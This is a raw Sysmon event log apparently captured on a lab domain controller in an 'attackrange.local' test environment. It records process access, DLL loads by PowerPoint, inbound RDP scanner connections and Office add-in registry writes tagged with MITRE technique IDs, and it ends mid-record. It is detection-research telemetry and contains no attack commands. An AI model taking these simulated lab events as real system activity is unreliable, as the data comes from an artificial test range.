14:58:42.560{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1300-00000000BB01}1264C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080551Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.560{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1300-00000000BB01}1264C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080550Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.528{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC22-607E-A40E-00000000BB01}4148C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080549Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.497{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000080548Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.450{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Windows\System32\wbem\fastprox.dll10.0.14393.0 (rs1_release.160715-1616)WMI Custom MarshallerMicrosoft® Windows® Operating SystemMicrosoft Corporationfastprox.dllMD5=C2F7834269D565263C65757EDE37A66C,SHA256=17651A35255229CE95F065CA1BCCC4867B43DA879D72AFCC91FBA4768225C7D3,IMPHASH=481A52B415277FC8692C7D6D9EA3475CtrueMicrosoft WindowsValid 734700x800000000000000080547Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.435{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Windows\System32\wbem\wbemsvc.dll10.0.14393.4169 (rs1_release.210107-1130)WMIMicrosoft® Windows® Operating SystemMicrosoft Corporationwbemsvc.dllMD5=2BE97028B7B85762561F475E31989C2A,SHA256=75C9D8C6D41B4B7D70666A8107A08A748CEF6CB9E60AD0288B10CDE12E274AFF,IMPHASH=200200BEAF933FA4627BF83C67BA473EtrueMicrosoft WindowsValid 10341000x800000000000000080546Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.419{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC22-607E-A40E-00000000BB01}4148C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080545Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.419{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71204028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC22-607E-A40E-00000000BB01}4148C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080544Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.419{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080543Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.419{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080542Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.403{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000080541Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.403{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Windows\System32\wbemcomn.dll10.0.14393.4283 (rs1_release.210303-1802)WMIMicrosoft® Windows® Operating SystemMicrosoft Corporationwbemcomn.dllMD5=EF7A4C64E4A6F52AEAF20828033ADFF8,SHA256=7108BBAE5B91ED6784BD32547F7BD9DEAD392E47ACAB29DC057AEF7CFB746F3C,IMPHASH=3775C2F7CD09C385EEDA8CBB7894E3E3trueMicrosoft WindowsValid 10341000x800000000000000080540Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.403{A7A01FEF-C0A6-607E-7B05-00000000BB01}18804408C:\Windows\system32\taskhostw.exe{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080539Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.403{A7A01FEF-C0A6-607E-7B05-00000000BB01}18804408C:\Windows\system32\taskhostw.exe{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000080538Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.403{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Windows\System32\wbem\wbemprox.dll10.0.14393.4169 (rs1_release.210107-1130)WMIMicrosoft® Windows® Operating SystemMicrosoft Corporationwbemprox.dllMD5=B7B56FAC395BEEDC20120FD0170A23A3,SHA256=7BDF579D7348D84F251A8411E40E14ADF9406F954914C1C4DE30E880DCF6CEB3,IMPHASH=96416B54C1F2E15EF294753DF1CB4131trueMicrosoft WindowsValid 354300x800000000000000080537Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:41.276{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com50573-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000080536Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:41.213{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com59267-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000080535Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.699{A7A01FEF-EBFE-607E-1F0E-00000000BB01}3308C:\Program Files\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57579-false52.114.32.25-443https 354300x800000000000000080534Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.696{A7A01FEF-EBFE-607E-1F0E-00000000BB01}3308C:\Program Files\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57580-false52.114.32.25-443https 354300x800000000000000080533Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.509{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-37645-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000080532Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:40.445{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local59367- 10341000x800000000000000080531Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.263{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC22-607E-A30E-00000000BB01}5592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080530Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.247{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080529Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.232{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC22-607E-A30E-00000000BB01}5592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080528Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.232{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC22-607E-A30E-00000000BB01}5592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080527Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.232{A7A01FEF-B624-607E-0B00-00000000BB01}8602300C:\Windows\system32\lsass.exe{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080526Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.232{A7A01FEF-B624-607E-0B00-00000000BB01}8602300C:\Windows\system32\lsass.exe{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000080525Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:42.200{A7A01FEF-EC22-607E-A20E-00000000BB01}1684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\694-0\Microsoft.VisualStudio.Tools.Applications.Runtime.dll2021-04-20 14:58:42.200 10341000x800000000000000080524Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.138{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC22-607E-A20E-00000000BB01}1684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080523Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.091{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC22-607E-A20E-00000000BB01}1684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080522Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.091{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71204028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC22-607E-A20E-00000000BB01}1684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000080521Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1137SetValue2021-04-20 14:58:42.013{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEHKU\S-1-5-21-325169965-3944942172-2068406585-500\SOFTWARE\Microsoft\Office\Outlook\Addins\AccessAddin.DC\CommandLineSafeDWORD (0x00000000) 13241300x800000000000000080520Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1137SetValue2021-04-20 14:58:42.013{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEHKU\S-1-5-21-325169965-3944942172-2068406585-500\SOFTWARE\Microsoft\Office\Outlook\Addins\AccessAddin.DC\LoadBehaviorDWORD (0x00000002) 13241300x800000000000000080519Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1137SetValue2021-04-20 14:58:42.013{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEHKU\S-1-5-21-325169965-3944942172-2068406585-500\SOFTWARE\Microsoft\Office\Outlook\Addins\AccessAddin.DC\FriendlyNameMicrosoft Access Outlook Add-in for Data Collection and Publishing 13241300x800000000000000080518Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1137SetValue2021-04-20 14:58:42.013{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEHKU\S-1-5-21-325169965-3944942172-2068406585-500\SOFTWARE\Microsoft\Office\Outlook\Addins\AccessAddin.DC\DescriptionThe Add-in allows Microsoft Access to integrate with and enable automated scenarios around Data Collection and Publishing around user created Access solutions 13241300x800000000000000080517Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2021-04-20 14:58:41.997{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEHKU\S-1-5-21-325169965-3944942172-2068406585-500\SOFTWARE\Microsoft\Office\Word\Addins\OneNote.WordAddinTakeNotesService\FriendlyNameOneNote Notes about Word Documents 13241300x800000000000000080516Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2021-04-20 14:58:41.997{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEHKU\S-1-5-21-325169965-3944942172-2068406585-500\SOFTWARE\Microsoft\Office\PowerPoint\Addins\OneNote.PowerPointAddinTakeNotesService\FriendlyNameOneNote Notes about PowerPoint Presentations 13241300x800000000000000080515Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1176SetValue2021-04-20 14:58:41.997{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEHKU\S-1-5-21-325169965-3944942172-2068406585-500\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButtonYes 13241300x800000000000000080514Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1137SetValue2021-04-20 14:58:41.982{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft 